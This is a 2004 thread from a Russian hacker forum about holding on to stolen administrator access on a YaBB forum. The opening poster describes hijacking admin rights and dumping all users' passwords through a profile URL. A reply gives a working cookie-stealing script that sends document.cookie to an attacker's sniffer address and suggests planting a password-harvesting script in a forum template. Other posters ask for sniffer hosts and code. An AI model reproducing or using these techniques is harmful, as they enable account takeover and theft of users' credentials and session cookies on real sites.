Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Как сохранить административный доступ на форуме yabb? (https://forum.antichat.xyz/showthread.php?t=1431)

12.01.2004 12:53
Как сохранить административный доступ на форуме yabb?
 
Народ помогите с сабжем!

Один раз загнал админа YaBB форума на свою страничку с фреймами, в нулевом фрейме сделал себя админом, выдрал все пароли юзеров через YaBB.pl?board=;action=profile;username= (в т.ч. пароль админа).

А теперь вопрос -  имея админский доступ к форуму можно ли его как-нить "затроянить"? т.к. "умные" пользователи имеют свойство время от времени менять свой пароль http://forum.antichat.ru/iB_html/non...ticons/sad.gif А каждый раз гнать админа на свою страничку как-то не хоцца...

Algol 12.01.2004 13:40
Создай новый аккаунт, дай ему админские права и сиди под ним.
Кроме того, если у тебя есть доступ к админке, то ты можешь запихнуть в какой-нибудь шаблон скриптик, который постоянно будет тебе слать пассворды юзеров (собственно это и будет настоящий троян)

Че Гевара 12.01.2004 14:45
А есть скрипт для отправки кукисов на мыло http://forum.antichat.ru/iB_html/non...s/confused.gif

Algol 12.01.2004 17:26
Не на мыло а на сниф:
< script>
var i=new Image;
i.src='http://адрес снифа'+'?'+document.cookie;
</script>

Че Гевара 12.01.2004 20:09
Алгол, а какие снифферы есть? В смысле адреса...

Че Гевара 12.01.2004 20:17
На античате есть?

igoreshka 12.01.2004 21:51
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Создай новый аккаунт, дай ему админские права и сиди под ним.
Кроме того, если у тебя есть доступ к админке, то ты можешь запихнуть в какой-нибудь шаблон скриптик, который постоянно будет тебе слать пассворды юзеров (собственно это и будет настоящий троян)[/QUOTE]<span id='postcolor'>
Сделать себя админом конечно привлекательно, НО
1. Админ на форуме изначально всего один, а пользователей не так уж много.
2. Статус админа сразу видно при просмотре списка юзеров да и при просмотре статистики форума выводится надпись типа - Администраторы:......

За скриптик спасибо! Если б еще листинг снифа простенького написал кто-нить http://forum.antichat.ru/iB_html/non...cons/smile.gif

Algol 13.01.2004 00:12
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Че Гевара @ января 12 2004,19:17)</td></tr><tr><td id="QUOTE">На античате есть?[/QUOTE]<span id='postcolor'>
Есть, но не для всеобщего пользования

11111118 01.02.2004 20:21
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ января 12 2004,23:12)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Че Гевара @ января 12 2004,19:17)</td></tr><tr><td id="QUOTE">На античате есть?[/QUOTE]<span id='postcolor'>
Есть, но не для всеобщего пользования[/QUOTE]<span id='postcolor'>
скинь в личку плз, если не трудно....)))

Че Гевара 01.02.2004 21:03
Ага, так он тебе и скинет http://forum.antichat.ru/iB_html/non...cons/smile.gif


Время: 18:41
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице